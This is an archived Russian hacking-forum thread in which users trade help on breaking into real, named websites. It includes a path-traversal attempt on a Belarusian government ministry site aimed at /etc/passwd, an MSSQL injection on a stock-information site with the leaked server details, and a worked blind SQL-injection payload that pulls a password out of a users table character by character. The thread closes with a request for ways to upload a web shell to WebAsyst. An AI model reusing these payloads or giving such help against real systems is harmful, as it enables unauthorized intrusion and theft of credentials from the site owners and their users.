Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
17.05.2010, 13:35
|
|
Новичок
Регистрация: 06.05.2010
Сообщений: 7
Провел на форуме:
16119
Репутация:
1
|
|
вот урл:
http://mvd.gov.by/modules.php?name=../../../../../
ошибка такая:
Warning: file_exists() [function.file-exists]: open_basedir restriction in effect. File(modules/../../../../..//copyright.php) is not within the allowed path(s): (/hosting/mvd.gov.by/htdocs/) in /hosting/mvd.gov.by/htdocs/includes/javascript.php on line 59
вроде этого побывал:
../../../../../../../etc/passwd//////////////////[..4095..]
не пашет
что делать?
Последний раз редактировалось ZAV; 17.05.2010 в 13:39..
|
|
|
17.05.2010, 13:59
|
|
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418
Репутация:
386
|
|
инклудить то что разрешено в open_basedir
|
|
|
|
17.05.2010, 16:38
|
|
Участник форума
Регистрация: 06.02.2008
Сообщений: 110
Провел на форуме:
217423
Репутация:
32
|
|
Сообщение от shell_c0de
Есть скуля http://www.stockhouse.com/tools/?page=%2Fshfn%2Farticle%2Easp%3FedtID%3D18744'
mssql скуля но select режется =\ что можно предпринять еще ?
че-то у меня сомнения насчет SELECT..
@@version у тебя прокатило?
|
|
|
|
17.05.2010, 17:03
|
|
Познающий
Регистрация: 01.08.2006
Сообщений: 35
Провел на форуме:
94171
Репутация:
3
|
|
Имеется сайт, в нем скуля в .... ORDER BY $id
Переборка запроса вроде
Код:
(id*IF(ASCII(SUBSTRING(USER(),1,1))=113,1,-1))
работает.
Вопрос: как в таком случае использовать (UNION) SELECT? Или любой другой способ сделать выборку из бд? |
|
|
|
17.05.2010, 17:05
|
|
Участник форума
Регистрация: 07.02.2010
Сообщений: 111
Провел на форуме:
619439
Репутация:
127
|
|
Сообщение от [R]eD
Имеется сайт, в нем скуля в .... ORDER BY $id
Переборка запроса вроде
Код:
(id*IF(ASCII(SUBSTRING(USER(),1,1))=113,1,-1))
работает.
Вопрос: как в таком случае использовать (UNION) SELECT? Или любой другой способ сделать выборку из бд? Ссылку в студию
|
|
|
|
17.05.2010, 17:07
|
|
Познающий
Регистрация: 01.08.2006
Сообщений: 35
Провел на форуме:
94171
Репутация:
3
|
|
Сообщение от b82a
Ссылку в студию
К сожалению дать не могу, но тут и так все ясно...
Запрос там вида SELECT .... FROM .... ORDER BY $id
$id - не фильтрауется.
|
|
|
|
17.05.2010, 17:35
|
|
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418
Репутация:
386
|
|
[R]eD, вместо user() запрос свой вставляй, типа select+table+where+id='5' только в () запрос возьми
|
|
|
|
17.05.2010, 17:35
|
|
Участник форума
Регистрация: 06.02.2008
Сообщений: 110
Провел на форуме:
217423
Репутация:
32
|
|
Сообщение от [R]eD
Имеется сайт, в нем скуля в .... ORDER BY $id
Переборка запроса вроде
Код:
(id*IF(ASCII(SUBSTRING(USER(),1,1))=113,1,-1))
работает.
Вопрос: как в таком случае использовать (UNION) SELECT? Или любой другой способ сделать выборку из бд? Все достаточно просто: с помощью подзапросов, вместо user() подставляешь запрос типа (SELECT+password+FROM+users+WHERE+userid='1') и таким образом запрос получается такой:
(id*IF(ASCII(SUBSTRING((SELECT+password+FROM+users +WHERE+userid='1'),1,1))=113,1,-1)), а далее посимвольно перебираешь остальную часть пароля
|
|
|
|
17.05.2010, 18:19
|
|
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
Провел на форуме:
1585404
Репутация:
564
|
|
Сообщение от mr.celt
че-то у меня сомнения насчет SELECT..
@@version у тебя прокатило?
Извращаясь вот что удалось вывести ...
VersionMicrosoft SQL Server 2005 - 9.00.3042.00 (X64)
Feb 10 2007 00:59:02
Copyright (c) 1988-2005 Microsoft Corporation
Enterprise Edition (64-bit) on Windows NT 5.2 (Build 3790: Service Pack 2)
DbStocks
ServerE3S9\FT0
Userwebguestsql
PrivilegePublic
дальше ничего не получается =\
Последний раз редактировалось shell_c0de; 17.05.2010 в 18:38..
|
|
|
|
17.05.2010, 18:21
|
|
Участник форума
Регистрация: 21.09.2008
Сообщений: 148
Провел на форуме:
678893
Репутация:
102
|
|
Интересуют методы заливки шелла на WebAsyst (v.2.4.7)
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [R]eD](/avatars/avatar26157.gif){kind=avatar}
Похожие темы
Линейный вид
